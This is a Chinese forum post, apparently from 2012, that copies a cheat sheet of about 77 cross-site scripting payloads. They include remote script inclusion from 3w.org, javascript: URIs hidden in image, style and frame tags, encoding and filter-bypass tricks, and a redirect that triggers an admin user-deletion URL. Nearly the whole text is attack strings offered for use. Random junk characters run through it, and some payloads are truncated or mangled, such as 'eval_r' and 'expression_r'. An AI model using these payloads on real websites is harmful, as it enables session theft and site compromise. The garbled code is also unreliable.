貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。' Y! _' c. h. d( N6 n8 j
0 d* R/ H0 y* N+ y7 F1 u* e% T
(1)普通的XSS JavaScript注入, h$ f% ]0 E2 H/ g' `; Q
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
6 y0 x w1 |( o8 B5 J; P
3 `6 z) ~- S7 f- ^+ v# ~! g (2)IMG标签XSS使用JavaScript命令2 G. U4 @) O: E6 Q7 d. c: ~3 c
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
) Y; R8 r0 J. {/ |0 U; @
/ f$ c1 f* x: H/ ^; V) e- U (3)IMG标签无分号无引号
2 j ^/ G5 ?+ D% f5 n6 G" Y <IMG SRC=javascript:alert(‘XSS’)>: V& a' V+ c/ |/ _ c$ H. m& N4 j
" H$ |! F; O9 H (4)IMG标签大小写不敏感+ ]5 y6 |# x2 J9 J' y
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
* [; A. L7 b9 b: y0 [8 h
1 F& Z) G8 ]- O$ t& F \( L (5)HTML编码(必须有分号): W \: l9 F$ t! Q) y# X( v4 L7 _, L
<IMG SRC=javascript:alert(“XSS”)>9 ~* n: p' s0 m' w- }, m- l/ X
, b; o& g# P5 { (6)修正缺陷IMG标签* S5 \- f7 m: t4 ?: G
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
7 f7 t! S4 n/ ^; J) d9 H4 e
$ k! z% R: x' A! P (7)formCharCode标签(计算器): `# z) J% X( F* l6 m
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
! A: ?2 ?- { l9 d: L4 Z4 }# _! m4 w# }5 t! t
(8)UTF-8的Unicode编码(计算器)
5 C1 j% G$ A6 L# h <IMG SRC=jav..省略..S')>& Y$ H" @% b/ a: k1 R
3 N; n! J. M0 O2 \& f2 y( Z/ E
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)2 w2 {. N! Q# M& l
<IMG SRC=jav..省略..S')>
s" w8 c i& ]9 Q( L3 _9 _$ q" G2 D, w' d" d
(10)十六进制编码也是没有分号(计算器)
7 J% i4 m- m$ T, W* L4 p. L <IMG SRC=java..省略..XSS')>$ P! `- m2 d- c; A% x1 T
$ z0 J7 l5 T A. q
(11)嵌入式标签,将Javascript分开* k: q! _& u# V; A8 M; s
<IMG SRC=”jav ascript:alert(‘XSS’);”>, |1 Z; a+ f/ n9 l
+ i. H9 i$ C A5 e1 d* k2 N' B) l
(12)嵌入式编码标签,将Javascript分开; ]( a7 }0 f; Z6 @* [/ T7 B
<IMG SRC=”jav ascript:alert(‘XSS’);”>0 V8 h0 @9 R* B( j, L9 J
2 p4 @6 [1 @7 Z+ {/ t4 x9 j (13)嵌入式换行符
( W- S S- Q8 u5 [ <IMG SRC=”jav ascript:alert(‘XSS’);”>
3 B6 ]4 {& D( d6 S5 j, N6 r$ E/ ~9 Z6 _5 P+ J. a$ y6 Y
(14)嵌入式回车- X$ Y0 g( @0 [/ ~+ f
<IMG SRC=”jav ascript:alert(‘XSS’);”>
# @8 q3 j, J4 o( l$ B6 H
' i* O4 X3 [* b0 K6 `: i# | (15)嵌入式多行注入JavaScript,这是XSS极端的例子9 j3 }' f# l* G3 j& s
<IMG SRC=”javascript:alert(‘XSS‘)”>
$ N! A8 `# V c# x" z; n8 d0 s4 P( K2 U
(16)解决限制字符(要求同页面). L* n* j% A, G+ ~
<script>z=’document.’</script>1 H4 ]+ {) A8 v+ |! P; N
<script>z=z+’write(“‘</script>+ F# L1 s: D- L9 O% S3 ]+ K
<script>z=z+’<script’</script>8 I0 T$ S2 t/ q% R& q
<script>z=z+’ src=ht’</script>1 K9 T/ Z9 O& r. S$ z& t
<script>z=z+’tp://ww’</script>/ w' ]) m, U" f- r
<script>z=z+’w.shell’</script>4 R) ^* Q7 R% w' y
<script>z=z+’.net/1.’</script>
. |' v0 t# `: Z& @ <script>z=z+’js></sc’</script>" Y7 z: T/ O* H5 l; G' M [% U
<script>z=z+’ript>”)’</script>
- a* }" X* _. C5 r <script>eval_r(z)</script>
" g& [0 l6 w, f6 i" f/ |# ^* ^3 B( p3 v
(17)空字符! t8 t q, y' L' d
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
# N3 a2 T" h+ Y9 }; I3 r T( }+ k4 o- F$ C( ^* S8 }" j; Z
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用1 c O- a5 y0 ]9 F
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out, g8 E5 e( c% \4 d8 J; B
1 R! D+ @" ]# N9 v& H" m
(19)Spaces和meta前的IMG标签$ U$ _) ~! [9 m
<IMG SRC=” � javascript:alert(‘XSS’);”>+ H3 D# t: |4 g, q" h) ^1 y" [/ n
! d S. N- e; f# _. o5 G
(20)Non-alpha-non-digit XSS' \' J, P7 j2 e8 z- c |) Q
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>% _; @ r7 i* M4 n) i
# b q# g- [: N5 m: r. n
(21)Non-alpha-non-digit XSS to 2
p. K9 }; p: i% J4 Q0 q <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
( k7 Q" W p7 x# s
' W h. u g! r" _ (22)Non-alpha-non-digit XSS to 3. E( s! j2 Z( B) e2 a
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>9 f. Y; C) ~6 D9 L! t$ l" E
* f ]0 d }# F' n6 i- l+ n1 | (23)双开括号
7 U: s# ]; f4 B5 f2 h6 [7 @5 N2 ] <<SCRIPT>alert(“XSS”);//<</SCRIPT>
9 l# `' k! Q" D! B7 h( l4 U4 [2 F# J7 _4 S, T9 k
(24)无结束脚本标记(仅火狐等浏览器)" Q& U0 _# ?) `+ ~6 n% Z
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>7 c6 }, V9 R( `9 t* F I! t0 v
+ [ }2 r# c m0 F6 ` \1 d (25)无结束脚本标记26 K) x9 p0 L( E" J+ e& p0 F
<SCRIPT SRC=//3w.org/XSS/xss.js>
. `8 ^0 f8 p. K. K+ P! d) v( U
4 ^% U: G: l- g5 @) m$ y% e (26)半开的HTML/JavaScript XSS
/ u% ~8 A$ F1 D! U2 G6 d6 Q <IMG SRC=”javascript:alert(‘XSS’)”
8 ]0 _0 }4 _1 v- f7 @' |0 O& z k- \! E0 V/ o5 m' \: p
(27)双开角括号
+ f- G+ `: c2 j" B" b, [3 |; Z, U" |+ h8 ^+ D <iframe src=http://3w.org/XSS.html <
& |6 w" k0 X% Q0 N9 z ?5 g" }* K7 l. m [3 z' V: A) G2 z
(28)无单引号 双引号 分号& F' F) p& d7 G R3 m
<SCRIPT>a=/XSS/" L0 K; ]! Z. Z- l
alert(a.source)</SCRIPT>' X9 A/ Z6 ]) L0 o2 [' _8 ~+ p
7 N0 {- ^* R' u4 Q9 Z& j (29)换码过滤的JavaScript
; C, L E. Q8 A8 Q# A1 ^$ { \”;alert(‘XSS’);//
* k2 s8 g4 P/ B* T* g- J9 L' W2 ~% i# U( V/ Y8 f
(30)结束Title标签$ c" M' j2 @5 k2 p2 m8 ?) O: L
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
% F& U7 r) Y6 Q9 w3 E, s/ w( w9 f0 a4 E5 F
(31)Input Image2 K6 c$ U% \6 J' W }
<INPUT SRC=”javascript:alert(‘XSS’);”>
& K+ i/ D9 `1 E j$ d
. p' m7 l7 `( W: r2 J (32)BODY Image# V; R: c3 _2 H1 i7 |
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>, j4 B2 F. ?4 h! `
) `6 H1 z' T; c& u. R+ Z9 t A (33)BODY标签
7 ~1 u6 R9 b! @0 m <BODY(‘XSS’)>
# @% c: m0 F& f- r' N' {5 @) M: G2 s4 n" _$ O7 t
(34)IMG Dynsrc
5 z( ` [- _6 w/ M# a <IMG DYNSRC=”javascript:alert(‘XSS’)”>* y/ M* p2 |9 X ?- n- J( e
# N8 [# d6 j# }. Y (35)IMG Lowsrc
P* T% A* k P <IMG LOWSRC=”javascript:alert(‘XSS’)”>$ F/ p5 Y8 G0 j2 n `
- o3 i- }5 O B. q$ ^+ h (36)BGSOUND; R0 m: K; o+ ]
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
. ?% R; G' X: i4 M" g8 w
- v: g9 ~9 C6 @ Y0 v' x (37)STYLE sheet
3 Q8 B' e9 C; e$ E h <LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>7 m& H( W: Z: P( Q
/ M% z. s1 w, v7 Z1 Y/ M; m( b* F
(38)远程样式表
# x; m( Y4 {% N1 b" E <LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>7 M# g2 r# _0 b3 o
% \- d: l1 b' _8 a$ v (39)List-style-image(列表式)
1 D7 n+ t$ v! r+ {. n <STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS. k. q2 L4 X, H9 L( ~
# n. t0 W R# g0 h: ^
(40)IMG VBscript
! u, f0 w9 h! u/ D0 _ <IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
1 S( M5 e. b3 t9 _, \ k8 x' _0 v. }9 {' p
(41)META链接url
: `$ i* C/ b; }8 Z/ d- O1 u- E <META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
8 u5 [4 ]$ j: p6 \1 l& {1 ?% f& J6 q1 x, ^6 _) ^4 w
(42)Iframe
0 H y1 o0 v, c- w% G <IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
; [3 p( U3 _6 _9 v6 O3 X$ g. H/ E! N! v/ n, `
(43)Frame# T4 _: b* A7 \' q& F2 Q% `
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>
7 G2 n, G: D2 f3 z+ z* ?. s
7 o( O) O/ v8 Y( v" p7 F& l8 S1 q; k$ L (44)Table
# r1 d9 t5 V* p& x4 L W <TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
0 c q4 v6 o: n2 V
7 n! m. N% p1 w0 @( y (45)TD
# z n" _: ]; s <TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
2 M9 Z. A! c/ e! j" o# P7 t. q, i
& W& q( t/ D' h: S (46)DIV background-image
. {0 \, {8 P/ Z: }: O# h" l <DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>/ ?' ^: l! i4 j
/ w$ I( P# I% T" z8 {9 ]4 P8 ~
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279), I6 M z: s5 S" U
<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>) n$ V7 D; ~( f
+ A- |* S2 g. ^4 n (48)DIV expression
6 L$ T/ D' z0 b: R8 Z$ Z' l <DIV STYLE=”width: expression_r(alert(‘XSS’));”>' N& X2 O3 W( N+ R
3 t$ R a. b/ O* y4 H (49)STYLE属性分拆表达' }; w, e" A' v
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”># t# H. I) |" p+ ?
% |% [7 g0 r) W3 D
(50)匿名STYLE(组成:开角号和一个字母开头)' g! ]6 v0 w& M" h
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
7 w, G! [7 N7 M% R
0 s5 {: x. t; J4 b (51)STYLE background-image& y2 I3 V5 _3 V, [7 V1 T
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
' T' f+ e' B _: y2 F" Z' b" O0 I+ W4 I+ q
(52)IMG STYLE方式
& n9 @: s% |6 w: S$ _ exppression(alert(“XSS”))’>2 `3 o, s, O/ Q) v' `
/ i& B1 d- f# h" r5 A2 L
(53)STYLE background
; l* ~- d4 W9 ~8 L) G( D <STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
6 y7 b. ^& O: C
7 p2 I+ ~: v$ G8 `8 F9 B (54)BASE
- C% W/ X9 j7 N$ h0 o/ [7 h <BASE HREF=”javascript:alert(‘XSS’);//”>
2 }3 g7 |& E J/ H5 j. F/ O7 |6 L. b3 }
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
; J! L5 ^7 z! E4 N <EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
3 _: A4 w: Q4 G1 N m1 l- q. [/ K
(56)在flash中使用ActionScrpt可以混进你XSS的代码0 v; z4 L3 d% n
a=”get”; r: I8 M3 L8 O6 E% e
b=”URL(\”";
/ Y/ w3 }+ T5 {$ o c=”javascript:”;
9 p4 ?2 \* e$ i+ j8 y4 W% r' i; g# T d=”alert(‘XSS’);\”)”;8 w2 b, m- N) x8 j9 p
eval_r(a+b+c+d);
: [+ O4 u7 o. H' B- a+ j6 T# v$ C! C1 z3 I/ T L H: D8 k, u( L
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上6 I% t" I" Y& P% b5 t* m6 ~. T/ A2 \
<HTML xmlns:xss>+ s7 m% s! u' R3 X. k) @
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
+ X( n2 y2 m2 ?, ~- _ | <xss:xss>XSS</xss:xss>
' g$ D/ R0 n3 ~, |2 E% t; {7 g </HTML>: f) h0 H& V6 o9 A
7 F& Z+ S- r+ P& e& X (58)如果过滤了你的JS你可以在图片里添加JS代码来利用
9 o, K4 `4 a: D2 d2 k4 c <SCRIPT SRC=””></SCRIPT>, Y( Z- k9 s8 X/ A; J/ o' F
% W: V5 {- e4 I( f+ N3 @
(59)IMG嵌入式命令,可执行任意命令- a0 [" H' ?1 o; P Q
<IMG SRC=”http://www.XXX.com/a.php?a=b”>9 U: a* W6 p3 \0 q+ s# u, Z
4 c, c6 s4 t2 M Q: m: y& n
(60)IMG嵌入式命令(a.jpg在同服务器)2 U0 F3 C( M9 {- ~
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser8 B4 Z% Z# }* b
+ d1 l5 J/ Q5 x1 G: m (61)绕符号过滤' M8 M$ r7 n. B9 W% x
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
! b x8 B1 i& _
) d2 l$ o; m( s1 W+ b+ B0 r (62)0 a: {! y5 e* d6 L
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
1 m J" G9 F3 X0 q
) J( {, B+ ~6 g (63)1 H* Z5 |. ~/ v( z
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
# N8 t$ i/ w8 i# C! D2 ~$ g) N1 a, |" Q# l% c; |
(64)
& F2 n! x( b# G+ b* M <SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
& P) E/ {% n' |, `3 m" |1 K4 g
. K7 k3 ^' _6 m& |1 G8 r% s- n0 W (65)) q3 V9 z I9 X! \" Y+ {
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
( U, y9 i$ z8 I) m' J% s( `
0 O" y' F' T2 i* k8 ^ (66)6 Q5 C# x6 t& T9 b, i% x$ m9 r
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
/ X) m! `% b" j6 O, n2 k, t/ x" u
7 S- T0 a: ?9 z2 B6 z (67)
+ N/ i5 R$ Z; K+ V7 R* Z <SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>9 e3 b; X2 x# k' ^1 S
) @1 _) i$ m% j8 h& U
(68)URL绕行$ H' y9 W& O( _: H% I' T$ d
<A HREF=”http://127.0.0.1/”>XSS</A>5 Y7 }1 t8 S4 m" Y6 x2 M
( W6 Y) z, @" j4 i1 T (69)URL编码0 ^! |1 W; \% X% W
<A HREF=”http://3w.org”>XSS</A>
$ u2 ?* R% Z1 g* T/ w6 K2 @1 {; l5 [! X* X2 q% J# S
(70)IP十进制( A# @. L% M7 K& g* E" s
<A HREF=”http://3232235521″>XSS</A>
# C `. ?, M- l8 A3 F/ ` R# Q
$ H( U& P, Z; |" S2 |# { (71)IP十六进制
9 b/ v! E5 [. k; _& s: C <A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
/ G7 J+ W6 S/ O6 ~3 I0 H+ W# m
4 k* G. K6 {5 [0 M4 Z (72)IP八进制
* W! T1 p+ l8 Q# |) K) {+ D: y <A HREF=”http://0300.0250.0000.0001″>XSS</A>
% j8 `& O/ i! ]5 _
/ b; l" L8 ? m2 A0 E( j (73)混合编码: |1 B- h: r, G7 @) l
<A HREF=”h0 G0 T6 E1 [/ J# @ t5 B: C
tt p://6 6.000146.0×7.147/”">XSS</A>
/ b% F! X; J! ~' I; B5 Y/ c4 M
' {/ z0 n" a, p1 y' [ (74)节省[http:]
6 k! X6 l( f+ ~1 u) B; [% F <A HREF=”//www.google.com/”>XSS</A>$ w1 h0 v! x; C/ z3 D9 f. x
$ l2 g- }7 Z; G/ w9 r! b6 v- Q0 m (75)节省[www]7 M" j- F$ k/ A9 n3 Z
<A HREF=”http://google.com/”>XSS</A>
* Y$ S: c9 S6 T# x+ K
; c1 ~$ O9 C& {- L5 M) Y6 S) z (76)绝对点绝对DNS9 [, ~, m$ B! I5 L& ?
<A HREF=”http://www.google.com./”>XSS</A>
, n# d |- e* v+ y+ U" x) w6 |, ? r! T6 F7 m* O
(77)javascript链接
' p v$ V" @/ B" @ <A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A> |
发表于 2012-9-5 14:56:34
收藏
支持
反对